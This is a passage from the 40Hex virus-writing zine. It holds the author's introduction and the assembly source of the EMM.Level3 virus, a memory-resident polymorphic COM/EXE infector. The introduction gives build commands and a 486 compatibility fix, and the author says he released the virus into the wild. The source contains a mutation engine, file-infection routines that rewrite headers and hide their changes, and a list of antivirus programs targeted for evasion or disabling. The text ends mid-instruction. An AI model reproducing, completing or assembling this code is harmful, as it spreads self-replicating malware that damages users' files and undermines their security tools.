40Hex Number 14 Volume 5 Issue 1 File 010 comment % Dear Virus Friends, dis is so far my latest production. It is a polymorphic virus that uses some stealth techniques. After execution of infected file, it goes memory-resident and hits com'n'exe on execution or creation. There are two interesting features to this. First it is the polymorphic engine that generates two-phase decrypting routine. First phase consists of various instructions, among them some decrypt phase two. Phase two is a regular cyclical decryptor. (By altering phase two you probably can avoid detection by the virus scanners.) Second feature is demobilising of resident virus utilities (see source code of function "eliminate_av" for further details). Well, after I planted this virus in the field, I was told it does not run on 486s. The problem is that prefetch queue is longer on 486 than on my home machine and that's why self modyfying code does not work. Well, sorry for that, I really didn't mean to. To correct this problem, follow the instructions in the source code marked by "#####". To get a working copy of original EMM.Level3 virus do the following: tasm level3.asm (I used ver. 2.51; do not use /M switch) tlink level3.obj (I used ver. 4.00) level3.exe Btw, I am Vyvojar, and you may have met Explosion and One Half - the forerunners to Level3. (pre SVL: na stretnutie sa tesim :)) - len neviem ako sa skontaktujeme ... skuste sa na mna spytat na irc - kanal #virus) % .model small .stack 80h host_segment segment mov ax,4c00h int 21h host_segment ends virus_segment segment assume cs:virus_segment,ds:virus_segment start_virus label near DEPTH=5*3 sstack db DEPTH dup(?) ssp dw DEPTH ;stack simulation LENOVER=DEPTH ;length of overwritable bytes LENVIR=(offset end_virus-offset start_virus) LENHBUF=700 ;length of header buffer (for phase 1) EXTENTION=(16+LENVIR+LENHBUF) ;by this number infected file grows DEPSTACK=80h LENFNB=64 ;length of file name buffer LENDEC=(edec-sdec) ;decoder length (phase 2) MEMPOS=04fbh ;memory location for far jump within segment 0000h ORDER=25 strc struc ;structure for exe header id dw ? lpage dw ? pages dw ? items dw ? parps dw ? min dw ? max dw ? vSS dw ? vSP dw ? flag db ? ;com/exe determination db ? vIP dw ? vCS dw ? strc ends bheader strc <1,,,,,,,0,,1,,0,0> v16 dw 16 v30 dw 30 v512 dw 512 ;********************** Explosion's Mutation Machine ********************* db '* EMM 1.0 *' rnd_get: push si push ax push bx push cx push dx db 0b9h rnd2 dw ? db 0bbh rnd1 dw ? mov dx,015ah mov ax,4e35h xchg ax,si xchg ax,dx test ax,ax jz rnd_l1 mul bx rnd_l1: jcxz rnd_l2 xchg ax,cx mul si add ax,cx rnd_l2: xchg ax,si mul bx add dx,si inc ax adc dx,0000h mov cs:rnd1,ax mov cs:rnd2,dx mov ax,dx pop cx xor dx,dx jcxz rdbz ;division by zero div cx jmp short danilak_vyskumnik rdbz: xchg dx,ax ;if dx=0 on input then interval 0-ffff danilak_vyskumnik: pop cx pop bx pop ax pop si retn registers label near ;flag,value,offset when w=0 (operation with byte) rax db 3 dup(?),(offset rax-offset registers) rcx db 3 dup(?),(offset rcx-offset registers) rdx db 3 dup(?),(offset rdx-offset registers) rbx db 3 dup(?),(offset rbx-offset registers) rsp db 3 dup(?),(offset rax-offset registers) rbp db 3 dup(?),(offset rcx-offset registers) rsi db 3 dup(?),(offset rdx-offset registers) rdi db 3 dup(?),(offset rbx-offset registers) res db 4 dup(?) rflag db 4 dup(?) ;bits in flag: ; 0 = lo part of register set if 1 ; 1 = hi part of register set if 1 ; 2 = don't change value of register if 1 (for sp) fw db ? ;fw=0 when byte operation, fw=1 when word operation choose: push ax ;selection of routine according to the table push cx ;ds:si points to the table push dx ;table is in the format: byte/probability push si ; word/adr of routine xor cx,cx ;table ends with 0ffh take_next: lodsb cbw add cx,ax cmp al,0ffh lodsw jne take_next inc cx ;subtract 0ffffh pop si mov dx,cx call rnd_get try_next: lodsb cbw sub cx,ax lodsw cmp dx,cx jb try_next xchg si,ax pop dx pop cx pop ax jmp si ;jump to the selected routine getaddr: ;get addr of reg within registers table push ax push bx mov si,dx shl si,1 shl si,1 mov bx,offset registers add si,bx mov ch,3 ;mask for word register cmp fw,0 jne chsl add si,3 lodsb cbw xchg si,ax add si,bx dec ch ;mask for hi byte of reg test dl,04h jnz chsl dec ch ;mask for lo byte of reg chsl: pop bx pop ax retn gregl: ;select target reg (output in dx) push cx push si gregl_other: mov dx,8 call rnd_get call getaddr test byte ptr [si],04h ;can I modify value of reg? jnz gregl_other pop si pop cx retn gregp: ;select source reg with defined value (output in dx) push ax xor ah,ah jmp short kazisvet_prefikany gregls: ;select target reg with defined value (output in dx) push ax gl108: mov ah,04h kazisvet_prefikany: push cx push si push bp mov dx,8 call rnd_get mov bp,dx xor dx,dx mov cl,dl grdl1: call getaddr lodsb test al,ah jnz grng1 and al,03h cmp al,03h je vrah_pocitacovy_kosicky cmp al,ch jne grng1 vrah_pocitacovy_kosicky: inc cx dec bp js tulen_bacil grng1: inc dx cmp dx,8 jb grdl1 or cl,cl jnz gra1v stc jmp short grnv gra1v: and dx,07h jmp grdl1 tulen_bacil: clc grnv: pop bp pop si pop cx pop ax retn wtreg: ;write value into reg push cx push si call getaddr inc si cmp ch,3 jne wtw1 mov [si],ax jmp short wtb1 wtw1: cmp ch,1 je panko_revizor inc si panko_revizor: mov [si],al wtb1: pop si pop cx retn rfreg: ;read value from reg push cx push si call getaddr inc si cmp ch,3 jne rfw1 lodsw jmp short rfb1 rfw1: cmp ch,1 je rfnp inc si rfnp: lodsb rfb1: pop si pop cx retn shl3fw: or al,fw shl3dl: push dx mov cl,3 shl dl,cl or ah,dl pop dx retn ;************************* generating of MOV ********************* ;generating of mov reg,imm mt1: call gregl push dx mov al,fw mov cl,3 shl al,cl or al,10110000b or al,dl stosb xor dx,dx call rnd_get xchg ax,dx pop dx call wtreg call getaddr or [si],ch cmp ch,3 jne bt1 stosw jmp wd1 bt1: stosb wd1: retn ;generating of mov reg,reg mt2: call gregp jc wd1 call rfreg push ax mov ax,1100000010001010b or al,fw or ah,dl mov bx,dx nti1: call gregl cmp bx,dx je nti1 call shl3dl stosw pop ax call wtreg call getaddr or [si],ch retn chtab00 db 45 dw offset mt1 db 45 dw offset mt2 db 3 dw offset mt6 db 3 dw offset mt7 db 1 dw offset mt3 db 1 dw offset mt4 db 1 dw offset mt5 db 0ffh gmovr: mov si,offset chtab00 jmp choose ;generating of mov ds,reg mt5: mov fw,1 test res+3,1 jnz mt5err ;if ds is set to cs, do nothing call gregp jc mt5err mov ax,1101100010001110b or ah,dl stosw mt5err: retn ;generating of mov reg,sreg mt4: mov fw,1 mov dx,20h call rnd_get mov ax,1100000010001100b or ah,dl and ah,0f8h call gregl or ah,dl stosw call getaddr and ah,00011000b jz sppse and byte ptr [si],0fch ;value in reg is not valid retn sppse: mov al,res mov [si],al mov ax,word ptr res+1 mov [si+1],ax retn ;generating of mov es,reg mt3: mov fw,1 call gregp jc mt3err mov ax,1100000010001110b or ah,dl stosw call rfreg or res,3 mov word ptr res+1,ax mt3err: retn ;generating of xor X,X mt6: mov al,00110010b jmp short com67 ;generating of sub X,X mt7: mov al,00101010b com67: mov ah,11000000b call gregl or ah,dl call getaddr or [si],ch ;reg is set to zero and has valid value mov word ptr ds:(offset gl102),0c032h jmp short pcpm67 ;******************** general part for OR, AND, ... ************************ perform_oper_l2: mov al,fw add byte ptr ds:(offset gl102),al call rfreg mov bp,word ptr rflag+1 push bp popf sti cld gl102: or al,bl pushf pop bp mov word ptr rflag+1,bp jmp wtreg perform_oper_l1: call perform_oper_l2 or rflag,1 retn chtab01 db 45 dw offset ot1 db 45 dw offset ot2 db 10 dw offset ot3 db 0ffh ggen2: lodsb mov ah,0c3h mov word ptr ds:(offset gl102),ax lodsb mov byte ptr ds:(offset gl104+1),al lodsb mov ah,11000000b mov word ptr ds:(offset gl105+1),ax lodsw mov word ptr ds:(offset gl106+1),ax mov si,offset chtab01 jmp choose ;generating of ins a?,imm ot3: xor dx,dx call getaddr lodsb and al,03h cmp al,03h je ot3obn cmp al,ch jne ot1 ot3obn: push dx gl104: mov al,00001100b or al,fw stosb jmp short tozti ;generating of ins reg,reg ot2: call gregp jc wdort1 call rfreg xchg bx,ax gl105: mov ax,1100000000001010b or ah,dl call gregls jc wdort1 pcpm67: call shl3fw stosw jmp perform_oper_l1 ;generating of ins reg,imm ot1: call gregls jc wdort1 push dx gl106: mov ax,1100100010000000b or al,fw or ah,dl stosw tozti: xor dx,dx call rnd_get mov bx,dx pop dx call perform_oper_l1 xchg ax,bx cmp fw,0 je bort1 stosw jmp wdort1 bort1: stosb wdort1: retn ;*********************** generating of OR *************************** orrdat db 0ah ;oper AL,BL ... inc ... oper AX,BX db 00001100b ;oper a?,imm db 00001010b ;oper reg,reg dw 1100100010000000b ;oper reg,imm gorr: mov si,offset orrdat pgen21: jmp ggen2 ;*********************** generating of AND *************************** andrdat db 22h ;oper AL,BL ... inc ... oper AX,BX db 00100100b ;oper a?,imm db 00100010b ;oper reg,reg dw 1110000010000000b ;oper reg,imm gandr: mov si,offset andrdat jmp pgen21 ;*********************** generating of XOR *************************** xorrdat db 32h ;oper AL,BL ... inc ... oper AX,BX db 00110100b ;oper a?,imm db 00110010b ;oper reg,reg dw 1111000010000000b ;oper reg,imm gxorr: mov si,offset xorrdat pggen2: jmp pgen21 ;*********************** generating of TEST ************************** testrdt db 84h ;oper AL,BL ... inc ... oper AX,BX db 10101000b ;oper a?,imm db 10000100b ;oper reg,reg dw 1100000011110110b ;oper reg,imm gtestr: mov si,offset testrdt ggen3: mov byte ptr ds:(offset gl108+1),00h ;target register can be any register set to proper value call ggen2 mov byte ptr ds:(offset gl108+1),04h ;restore retn ;*********************** generating of CMP *************************** cmprdat db 3ah ;oper AL,BL ... inc ... oper AX,BX db 00111100b ;oper a?,imm db 00111010b ;oper reg,reg dw 1111100010000000b ;oper reg,imm gcmpr: mov si,offset cmprdat jmp ggen3 ;*********************** generating of ADD *************************** addrdat db 02h ;oper AL,BL ... inc ... oper AX,BX db 00000100b ;oper a?,imm db 00000010b ;oper reg,reg dw 1100000010000000b ;oper reg,imm gaddr: mov si,offset addrdat jmp pggen2 ;*********************** generating of SUB *************************** subrdat db 2ah ;oper AL,BL ... inc ... oper AX,BX db 00101100b ;oper a?,imm db 00101010b ;oper reg,reg dw 1110100010000000b ;oper reg,imm gsubr: mov si,offset subrdat jmp pggen2 ;*********************** generating of ADC *************************** adcrdat db 12h ;oper AL,BL ... inc ... oper AX,BX db 00010100b ;oper a?,imm db 00010010b ;oper reg,reg dw 1101000010000000b ;oper reg,imm gadcr: mov si,offset adcrdat ggen4: test rflag,1 jnz pggen2 gg10err: retn ;*********************** generating of SBB *************************** sbbrdat db 1ah ;oper AL,BL ... inc ... oper AX,BX db 00011100b ;oper a?,imm db 00011010b ;oper reg,reg dw 1101100010000000b ;oper reg,imm gsbbr: mov si,offset sbbrdat jmp ggen4 ;***************** general part for INC,DEC,... ****************** chtab03 db 1 dw offset inct2 chtab04 db 1 dw offset inct1 db 0ffh ggen11: lodsw mov word ptr ds:(offset gl102),ax lodsw mov word ptr ds:(offset gl201+1),ax lodsb mov byte ptr ds:(offset gl202+1),al gl203: mov si,offset chtab03 jmp choose ;generating of ins reg8 or ins reg16 (2 bytes) inct1: call gregls jc gg10err gl201: mov ax,1100000011111110b ggen21: or al,fw or ah,dl stosw jmp perform_oper_l2 ;generating of ins reg16 (1 byte) inct2: mov fw,1 call gregls jc gg10err gl202: mov al,01000000b or al,dl stosb jmp perform_oper_l2 ;*********************** generating of INC *************************** incrdat dw 0c0feh ;operation dw 1100000011111110b ;2 bytes db 01000000b ;1 byte gincr: mov si,offset incrdat jmp ggen11 ;*********************** generating of DEC *************************** decrdat dw 0c8feh ;operation dw 1100100011111110b ;2 bytes db 01001000b ;1 byte gdecr: mov si,offset decrdat jmp ggen11 ;*********************** generating of NEG *************************** negrdat dw 0d8f6h ;operation dw 1101100011110110b ;2 bytes gnegr: mov si,offset negrdat push di call ggen12 pop ax cmp di,ax ;if no operation performed then no flags set jna inegbv or rflag,1 inegbv: retn ;*********************** generating of NOT *************************** notrdat dw 0d0f6h ;operation dw 1101000011110110b ;2 bytes gnotr: mov si,offset notrdat ggen12: mov word ptr ds:(offset gl203+1),offset chtab04 call ggen11 mov word ptr ds:(offset gl203+1),offset chtab03 xt1err: retn ;*********************** generating of XCHG ************************** chtab05 db 1 dw offset xchgt1 db 1 dw offset xchgt2 db 0ffh gxchgr: mov si,offset chtab05 jmp choose ;generating of xchg reg,reg (2 bytes) xchgt1: call gregls ;source operand jc xt1err call rfreg xchg bx,ax mov ax,1100000010000110b or ah,dl mov bp,dx call gregls ;target operand cmp bp,dx je xt1err push bp call shl3fw stosw gl301: call rfreg xchg ax,bx call wtreg pop dx xchg ax,bx jmp wtreg ;generating of xchg ax,reg (1 byte) xchgt2: mov fw,1 call gregls jc xt1err cmp rax,03h jne xt1err call rfreg xchg bx,ax mov al,10010000b or al,dl push dx xor dx,dx ;target operand stosb jmp gl301 ;***************** general part for SHL,SHR,... ****************** ggen20: mov al,11010000b test rcx,1 ;valid value in cl ? jz rbsh1 mov dx,2 call rnd_get ;shl ,cl or shl ,1 ? shl dl,1 or al,dl mov cl,rcx+1 rbsh1: mov word ptr ds:(offset gl102),ax call gregls jc gg20err and rflag,0feh ;flags not defined jmp ggen21 ;********************* generating of SHL,SAL ************************* gshlr: mov ah,11100000b jmp ggen20 ;*********************** generating of SHR *************************** gshrr: mov ah,11101000b jmp ggen20 ;*********************** generating of SAR *************************** gsarr: mov ah,11111000b jmp ggen20 ;*********************** generating of ROL *************************** grolr: mov ah,11000000b jmp ggen20 ;*********************** generating of ROR *************************** grorr: mov ah,11001000b jmp ggen20 ;*********************** generating of RCL *************************** grclr: mov ah,11010000b ggen22: test rflag,1 jz gg20err jmp ggen20 gg20err: retn ;*********************** generating of RCR *************************** grcrr: mov ah,11011000b jmp ggen22 ;*********************** generating of PUSH ************************** chtab06 db 15 dw offset gpt1 db 3 dw offset gpt2 db 1 dw offset gpt3 db 0ffh gpushr: cmp ssp,0 je gg20err ;emulated stack full mov si,offset chtab06 gl410: mov fw,1 jmp choose ;type: push reg gpt1: call gregl ;can push any reg (except sp) mov al,01010000b or al,dl stosb call getaddr lodsb xchg cx,ax call rfreg ;-------- simulation of PUSH -------- spush: sub ssp,3 sub word ptr rsp+1,2 mov si,ssp mov byte ptr [si+offset sstack],cl mov word ptr [si+offset sstack+1],ax retn ;type: push sreg gpt2: mov dx,00100000b call rnd_get xchg ax,dx or al,00000110b and al,11111110b gl409: stosb xor cl,cl cmp al,00000110b jne spush mov ax,word ptr res+1 mov cl,res ;if it is es jmp spush ;type: pushf gpt3: mov al,10011100b jmp gl409 ;*********************** generating of POP *************************** chtab07 db 15 dw offset gpot1 db 2 dw offset gpot2 db 1 dw offset gpot3 db 3 dw offset gpot4 db 0ffh gpopr: cmp ssp,DEPTH je gg20err ;emulated stack is empty mov si,offset chtab07 jmp gl410 ;type: pop reg gpot1: call gregl ;can pop any reg (except sp) mov al,01011000b or al,dl stosb call spop call getaddr mov byte ptr [si],cl call wtreg retn ;-------- simulation of POP -------- spop: mov si,ssp mov cl,byte ptr [si+offset sstack] mov ax,word ptr [si+offset sstack+1] add ssp,3 add word ptr rsp+1,2 retn ;type: pop es gpot2: mov al,00000111b stosb call spop mov res,cl mov word ptr res+1,ax chpote: retn ;type: pop ds gpot3: test res+3,1 jnz chpote ;if ds set to cs do nothing mov al,00011111b stosb jmp spop ;type: push cs,pop ds gpot4: test res+3,1 jnz chpote mov ax,0001111100001110b stosw or res+3,1 ;note that ds is set retn ;********************* generating of jumps ************************** MAXJMP=20 gbytes: push ax push cx push dx mov cx,dx jcxz gbsdda gbdb: xor dx,dx call rnd_get xchg ax,dx stosb loop gbdb gbsdda: pop dx pop cx pop ax retn takeb: call rnd_get add si,dx lodsb retn NOJCON=17 jcontab db 01110111b ;ja/jnbe db 01110011b ;jae/jnb/jnc db 01110010b ;jb/jnae/jc db 01110110b ;jbe/jna db 01110100b ;je/jz db 01111111b ;jg/jnle db 01111101b ;jge/jnl db 01111100b ;jl/jnge db 01111110b ;jle/jng db 11101011b ;jmp db 01110101b ;jne/jnz db 01110001b ;jno db 01111011b ;jnp/jpo db 01111001b ;jns db 01110000b ;jo db 01111010b ;jp/jpe db 01111000b ;js jcxdtab db 11100011b ;jcxz db 11100010b ;loop db 11100001b ;loope/loopz db 11100000b ;loopne/loopnz chtab09 db 24 dw offset gjcon db 5 dw offset gjcxd db 1 dw offset gjmpn db 3 dw offset gcall db 0ffh gjmp: mov si,offset chtab09 jmp choose ;generating of jx gjcon: test rflag,1 jz g40err mov si,offset jcontab mov dx,NOJCON ggen41: call takeb stosb mov byte ptr ds:(offset gl501),al mov cx,word ptr rcx+1 mov bp,word ptr rflag+1 push bp popf ;##### ;to run on 486 supply this: ; jmp $+2 ;##### gl501: jmp short gl502 xor dx,dx call rnd_get xchg ax,dx stosb jmp short g40mcx gl502: mov dx,MAXJMP ;max no of bytes to jump over call rnd_get mov al,dl stosb call gbytes g40mcx: mov word ptr rcx+1,cx g40err: retn ;generating of jcxz,loopx gjcxd: cmp rcx,3 jne g40err mov si,offset jcxdtab mov dx,2 test rflag,1 jz ggen41 mov dx,4 jmp ggen41 ;generating of jmp near gjmpn: mov al,11101001b stosb mov dx,MAXJMP call rnd_get mov ax,dx stosw jmp gbytes ;generating of call X gcall: test byte ptr eflag,4 jz g40err ;can't generate call if no retn before mov al,11101000b stosb mov ax,retnaddr dec ax dec ax sub ax,di stosw retn ;****************** generating of sti,cli,std,cld ********************** sacftb label byte sti cli std cld gsacf: mov si,offset sacftb mov dx,4 call takeb stosb retn ;********************* generating of mem. ins. ************************* chtab10 db 4 dw offset pissi db 4 dw offset pisdi db 4 dw offset pisbx db 1 dw offset pisbr db 0ffh g2ndb: mov si,offset chtab10 jmp choose pissi: mov bp,word ptr rsi+1 mov ah,10000100b cmp rsi,3 je chenbr pisdi: mov bp,word ptr rdi+1 mov ah,10000101b cmp rdi,3 je chenbr pisbx: mov bp,word ptr rbx+1 mov ah,10000111b cmp rbx,3 je chenbr pisbr: xor bp,bp mov ah,00000110b chenbr: retn insertcs: test res+3,1 ;ds set to cs ? jnz jtdss mov byte ptr [di],2eh ;insert cs: prefix inc di jtdss: retn ggen60: call gregp jc gmerr push ax call rfreg or al,al pop ax jz gmerr ;to avoid operation with 0 call shl3dl ggen61: or al,fw call insertcs stosw mov si,ptei mov word ptr [si],ax call rfreg mov word ptr [si+4],ax mov dx,LENDEC sub dl,fw ;to enable proper rotation call rnd_get mov word ptr [si+2],dx add ptei,6 mov ax,sodec add ax,dx sub ax,bp stosw and rflag,0feh ;flags modified gmerr: retn chtb20o db 6,8,8,2,2 ;starting probabilities for memory-modifying instructions chtab20 db ? dw offset gxorp db ? dw offset gaddp db ? dw offset gsubp db ? dw offset grolp db ? dw offset grorp db 0ffh gmutp: cmp ptei,offset eei jnb gmerr call g2ndb mov si,offset chtab20 jmp choose gxorp: mov al,00110000b jmp ggen60 gaddp: mov al,00000000b jmp ggen60 gsubp: mov al,00101000b jmp ggen60 grolp: mov al,11010000b mov dx,4 call rnd_get or dx,dx jz zbclns test rcx,1 ;cl set ? jz zbclns cmp rcx+1,0 je zbclns ;does not generate rotation ,cl if cl=0 or al,00000010b zbclns: mov dx,1 ;address for emulated cx jmp ggen61 grorp: or ah,00001000b jmp grolp ;********************* generating of mem. mov ************************** chtab30 db 5 dw offset pmvt1 db 1 dw offset pmvt2 db 0ffh gmovp: call g2ndb mov si,offset chtab30 jmp choose ;type: mov reg,mem pmvt1: call gregl mov al,10001010b call shl3fw push dx call insertcs stosw mov dx,di sub dx,offset hbuf+1 call rnd_get ;in dx offset within header buffer mov ax,rel add ax,dx sub ax,bp stosw xchg ax,dx pop dx call getaddr or [si],ch ;reg value is valid mov si,offset hbuf add si,ax lodsw jmp wtreg ;read byte and write to reg ;type: mov mem,reg pmvt2: call gregp jc pmverr mov al,10001000b call shl3fw call insertcs stosw mov dx,LENOVER-1 call rnd_get ;in dx offset within overwritable bytes mov ax,gba add ax,dx sub ax,bp stosw pmverr: retn chtabgl db 13 dw offset gjmp db 32 dw offset gmutp db 17 dw offset gmovp chtabg1 db 70 dw offset gmovr db 1 dw offset gsacf db 16 dw offset gpushr db 16 dw offset gpopr db 4 dw offset gshlr db 4 dw offset gshrr db 2 dw offset gsarr db 2 dw offset grolr db 2 dw offset grorr db 2 dw offset grclr db 2 dw offset grcrr db 7 dw offset gorr db 7 dw offset gandr db 4 dw offset gxorr db 4 dw offset gtestr db 9 dw offset gaddr db 9 dw offset gsubr db 2 dw offset gadcr db 2 dw offset gsbbr db 4 dw offset gcmpr db 4 dw offset gincr db 4 dw offset gdecr db 4 dw offset gxchgr db 2 dw offset gnegr db 2 dw offset gnotr db 0ffh EMM: cld mov cx,10 mov di,offset registers xor ax,ax li1: stosb ;initialize variables add di,3 loop li1 xchg bx,ax ;bx=0 mov al,eflag and al,01h mov res+3,al ;if al=1 ds is set, if al=0 ds is not set mov al,04h test byte ptr eflag,2 jz nsspj or al,03h nsspj: or rsp,al ;don't change sp , known value of sp on input mov ssp,DEPTH ;initialize ssp mov ptei,offset ei ;initialize ptei neprkm: mov cx,5 mov si,offset chtb20o mov di,offset chtab20 sprpm: lodsb cbw xchg dx,ax call rnd_get xchg ax,dx add bx,ax stosb inc di inc di loop sprpm ;setting of probabilities for memory-modifying instructions or bx,bx jz neprkm ;not accepted setting of the probabilities mov di,offset hbuf mov ax,-1 push ax test byte ptr eflag,4 ;generate intro garbage bytes ? jz ngenuv pop ax MAXINTRO=100 mov dx,MAXINTRO-1 call rnd_get inc dx ;in dx length of intro in bytes push dx push dx call rnd_get call gbytes ;write down random bytes mov retnaddr,di ;address of retn instruction mov al,11000011b stosb ;write retn pop ax sub ax,dx xchg dx,ax call gbytes ;random bytes ngenuv: mov ax,di sub ax,offset hbuf add ax,rel mov hip,ax ;ip value for the file MINHDR=400 ;minimal header length mov dx,LENHBUF-LENDEC-MINHDR+1 pop ax ;in ax length of intro-1 sub dx,ax call rnd_get add dx,ax add dx,MINHDR ;in dx start of decoder ;relatively to start of hbuf, i.e. header length mov hend,dx add hend,offset hbuf ;relocation relat. to start of buffer add dx,rel mov sodec,dx ;start of decoder within the file mov word ptr ds:(offset chchtb+1),offset chtabgl ;use all instructions mov byte ptr ds:(offset sj1+1),0 ;setting of the switched jump next_inst: push di mov dx,3 call rnd_get or dl,dl jz ginsh mov dl,1 ginsh: mov fw,dl ;byte or word inst. chchtb: mov si,offset chtabgl call choose ;generating of inst. pop ax sj1: jmp short gc1 gc1: push di ;##### ;to run on 486 change the following instruction ;which goes: add di,MAXJMP+3-1 ;into: add di,40 ;prefetch queue is 32B for 486 ;##### add di,MAXJMP+3-1 cmp di,hend pop di jb next_inst mov word ptr ds:(offset chchtb+1),offset chtabg1 ;do not generate mem-modifying ins. mov byte ptr ds:(offset sj1+1),offset gc2-offset gc1 ;switch of jump jmp next_inst gc2: cmp di,hend jb next_inst xchg di,ax jne next_inst ;if not end of header then repeat xchg di,ax mov bx,di mov ax,offset stsub+(hbuf-start_virus)-LENVIR-(dcjmp-sdec)-2 sub ax,di mov dcjmp,ax ;setting the jump in decoder mov si,offset sdec mov cx,LENDEC rep movsb ;copy decoder behind header mov si,ptei udzd: cmp si,offset ei jna vsmu sub si,6 ;reading of mem-modif. inst. in reverse order mov al,byte ptr [si] mov dl,al and dl,11111100b cmp dl,00000000b jne zop1 or al,00101000b zop1: cmp dl,00101000b jne zop2 and al,00000011b zop2: mov ah,10001111b and word ptr [si],0011100011111100b cmp word ptr [si],0000100011010000b jne njtsp and ah,11000111b ;xchange ADD for SUB, ROL for ROR and vice versa njtsp: mov word ptr ds:(offset vari),ax mov dx,word ptr [si+2] mov word ptr ds:(offset vari+2),dx mov cx,word ptr [si+4] jmp $+2 vari: xor [bx+1234h],cx ;perform reverse operation on decoder jmp udzd vsmu: retn ;******************* decoder **************** sdec: sti push cs pop ds dcmsi: mov si,1234h dcmax: mov ax,1234h mov cx,(LENVIR-1)/2+1 dp2: xor [si],ax jmp short dcaax1 dcaax2: add ax,1234h inc si loop dp2 db 0e9h dcjmp dw ? dcaax1: add ax,1234h inc si xor [si],ax jmp dcaax2 edec label near ;******************** Explosion's Mutation Machine ******************** ;*************** copied routines ************** zencode: mov cx,LENVIR xor dx,dx ;offset start_virus call zzp1 mov ah,40h mov bx,handle pushf db 9ah dd ? ;call ds:oriv21 jc zec1 cmp ax,cx zec1: pushf call zzp1 popf retn zzp1: push cx mov si,dx zecmax: mov ax,1234h mov cx,(LENVIR-1)/2+1 zzp2: xor [si],ax zecaax1: add ax,1234h inc si xor [si],ax zecaax2: add ax,1234h inc si loop zzp2 pop cx retn zres24: mov al,03h iret zenden label near ;************** routines for res. part ************* set_on_24: push dx push ds push cs pop ds mov ax,3524h call int21 mov seg24,es mov off24,bx mov ax,2524h mov dx,offset res24 call int21 pop ds pop dx retn set_off_24: mov ax,2524h lds dx,dword ptr cs:off24 call int21 retn identify: ;is file infected ? push dx mov ax,es:[bx+2] inc ax xor dx,dx div cs:v30 mov ax,es:[bx] and al,11111b cmp al,dl stc je iekon ;already infected mov ax,es:[bx] and ax,0ffe0h or al,dl clc iekon: pop dx retn ;*********** infect EXE,COM *********** write_file: mov ah,40h jmp short s1 read_file: mov ah,3fh s1: call s2 jc s3 cmp ax,cx s3: retn start_file: xor cx,cx mov dx,cx pos_start: mov ax,4200h jmp short s2 end_file: xor cx,cx mov dx,cx pos_end: mov ax,4202h mhandle: s2: mov bx,cs:handle int21: pushf cli call cs:oriv21 retn infect: mov ax,5700h call mhandle mov bx,offset ftime mov [bx],cx mov [bx+2],dx ;read in time and date of last write call identify jnc ienjnp igbck: retn ienjnp: xor dx,dx call rnd_get mov word ptr ds:(offset dcmax+1),dx mov word ptr ds:(offset ecmax+1),dx xor dx,dx call rnd_get mov word ptr ds:(offset dcaax1+1),dx mov word ptr ds:(offset ecaax1+1),dx xor dx,dx call rnd_get mov word ptr ds:(offset dcaax2+1),dx mov word ptr ds:(offset ecaax2+1),dx ;values for encoding call start_file mov cx,18h mov dx,offset header call read_file pigbck: jc igbck mov si,dx mov di,offset bheader rep movsb push dx call end_file mov lenlo,ax mov lenhi,dx mov si,ax mov di,dx pop bx cmp [bx].id,'MZ' je iEXE1 cmp [bx].id,'ZM' je iEXE1 mov bheader.flag,0 ;0 means COM cmp ax,65535-(EXTENTION+DEPSTACK) ;much too long ? ja igbck mov bheader.min,0000h ;min. memory is 0 jmp short iCOM1 iEXE1: mov bheader.flag,1 mov ax,[bx].pages mul v512 sub ax,si sbb dx,di jc pigbck ;overlay detected mov ax,si mov dx,di add ax,EXTENTION adc dx,0 div v512 or dx,dx jz spcp1 ;special case is that dx=0 inc ax spcp1: mov [bx].pages,ax mov [bx].lpage,dx ;setting pages and bytes in last page iCOM1: and si,0fff0h add si,16 adc di,0 mov dx,si mov cx,di push bx call pos_start ;allignment to the multiply of 16 pop bx cmp bheader.flag,0 jne iEXE2 mov byte ptr [bx],0e9h ;getting ready for jump add ax,100h mov gba,ax add ax,LENVIR mov rel,ax mov eflag,001b ;setting parameters for EMM jmp short iCOM2 iEXE2: mov ax,[bx].parps mul v16 sub si,ax sbb di,dx mov ax,si mov dx,di div v16 mov [bx].vCS,ax mov bheader.id,ax ;store org cs mov ax,[bx].vSS mul v16 mov cx,[bx].vSP add ax,cx adc dx,0 sub ax,si sbb dx,di jc zjvs sub ax,DEPSTACK sbb dx,0 jc pikon1 add [bx].vSS,(EXTENTION-1)/16 zjvs: mov rel,LENVIR mov gba,0 mov word ptr rsp+1,cx mov eflag,010b ;setting parameters for EMM iCOM2: mov ax,gba mov word ptr ds:(offset dcmsi+1),ax ;start for decoder mov word ptr ds:(offset stsub+1),ax ;for proper relocation mov dx,6 call rnd_get or dx,dx jz nguv or eflag,100b ;generates intro with probability 5 : 1 nguv: call EMM call encode jc pikon1 mov ax,hip cmp bheader.flag,0 jne iEXE3 sub ax,103h mov word ptr ds:(offset header+1),ax ;setting jump in com jmp short iCOM3 iEXE3: mov header.vIP,ax ;write down ip iCOM3: mov cx,di mov dx,offset hbuf sub cx,dx call write_file pikon1: jc ikon call start_file mov cx,18h mov dx,offset header call write_file jc ikon add lenlo,EXTENTION adc lenhi,0 ;change length mov dx,25 call rnd_get ;with probability 1 : 25 does not mark or dx,dx jz ikon mov bx,offset ftime call identify mov [bx],ax ;mark file ikon: mov dx,lenlo mov cx,lenhi call pos_start xor cx,cx call write_file ;allignment to constant length increase mov ax,5701h mov cx,ftime mov dx,fdate call mhandle ;setting time and date retn sublen: sub word ptr es:[bx],EXTENTION sbb word ptr es:[bx+2],0 jnc npretn add word ptr es:[bx],EXTENTION adc word ptr es:[bx+2],0 npretn: retn NOUNF=14 ;number of unfriendly programms titstr db 3,'COM',3,'EXE' titstr1 db 4,'SCAN',7,'VSHIELD',5,'CLEAN',8,'FINDVIRU',5,'GUARD' db 8,'VIVERIFY',2,'TB',2,'-V',7,'VIRSTOP',3,'NOD',4,'HIEW' db 5,'PASCA',7,'NETENVI',6,'F-PROT',6,'CHKDSK' check: push bx push cx push si push di push ds push es push ax mov si,dx mov bx,si xor di,di mov cx,LENFNB ol1: lodsb cmp al,'\' je stfn cmp al,'/' je stfn cmp al,':' jne nstfn stfn: mov bx,si nstfn: cmp al,'.' jne itnb1 mov di,si itnb1: or al,al jz whname loop ol1 jmp short oinok whname: cmp di,bx jbe oinok mov si,di mov di,offset titstr push cs pop es call compare je porok call compare jne oinok ;COM or EXE ? porok: mov cl,NOUNF+1 mov si,bx mov di,offset titstr1 ol2: push cx call compare pop cx je fkrpg loop ol2 ;check for unfriendly progs oiok: clc okon: pop ax pop es pop ds pop di pop si pop cx pop bx retn fkrpg: cmp cx,2 ja nvpst ;if F-PROT or CHKDSK switch off stealth pop ax push ax cmp ah,4bh ;execute ? jne nvpst mov byte ptr cs:(offset rpps1+1),offset ndnxt-offset con1 nvpst: cmp 